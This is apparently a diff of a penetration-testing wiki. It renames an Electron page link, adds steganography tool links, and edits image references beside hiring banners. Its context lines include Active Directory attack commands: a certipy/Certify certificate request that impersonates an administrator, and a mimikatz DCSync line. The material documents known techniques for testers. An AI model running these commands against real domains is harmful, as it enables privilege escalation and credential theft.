 [server-side-xss-dynamic-pdf.md](server-side-xss-dynamic-pdf.md)
 {% endcontent-ref %}
 
-{% content-ref url="../../network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/" %}
-[xss-to-rce-electron-desktop-apps](../../network-services-pentesting/pentesting-web/xss-to-rce-electron-desktop-apps/)
+{% content-ref url="../../network-services-pentesting/pentesting-web/electron-desktop-apps/" %}
+[electron-desktop-apps](../../network-services-pentesting/pentesting-web/electron-desktop-apps/)
 {% endcontent-ref %}
 
 ## WAF bypass encoding image

stego/stego-tricks.md

@@ -164,6 +164,9 @@ Get details on a PNG file (or even find out it's actually something else!).\
 
 * [http://magiceye.ecksdee.co.uk/](http://magiceye.ecksdee.co.uk/)
 * [https://29a.ch/sandbox/2012/imageerrorlevelanalysis/](https://29a.ch/sandbox/2012/imageerrorlevelanalysis/)
+* [https://github.com/resurrecting-open-source-projects/outguess](https://github.com/resurrecting-open-source-projects/outguess)
+* [https://www.openstego.com/](https://www.openstego.com/)
+* [https://diit.sourceforge.net/](https://diit.sourceforge.net/)
 
 ## Extracting data from audios
 

windows-hardening/active-directory-methodology/ad-certificates/domain-escalation.md

@@ -46,7 +46,7 @@ To **abuse this vulnerability to impersonate an administrator** one could run:
 
 ```bash
 Certify.exe request /ca:dc.theshire.local-DC-CA /template:VulnTemplate /altname:localadmin
-certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -alt 'administrator@corp.local'
+certipy req 'corp.local/john:Passw0rd!@ca.corp.local' -ca 'corp-CA' -template 'ESC1' -upn 'administrator@corp.local'
 ```
 
 Then you can transform the generated **certificate to `.pfx`** format and use it to **authenticate using Rubeus or certipy** again:

windows-hardening/active-directory-methodology/silver-ticket.md

@@ -12,7 +12,7 @@
 
 </details>
 
-<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -168,7 +168,7 @@ mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.loc
 [dcsync.md](dcsync.md)
 {% endcontent-ref %}
 
-<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 

windows-hardening/windows-local-privilege-escalation/dll-hijacking.md

@@ -12,7 +12,7 @@
 
 </details>
 
-<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
 
@@ -243,7 +243,7 @@ BOOL APIENTRY DllMain (HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReser
 }
 ```
 
-<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
+<img src="../../.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt="" data-size="original">
 
 If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).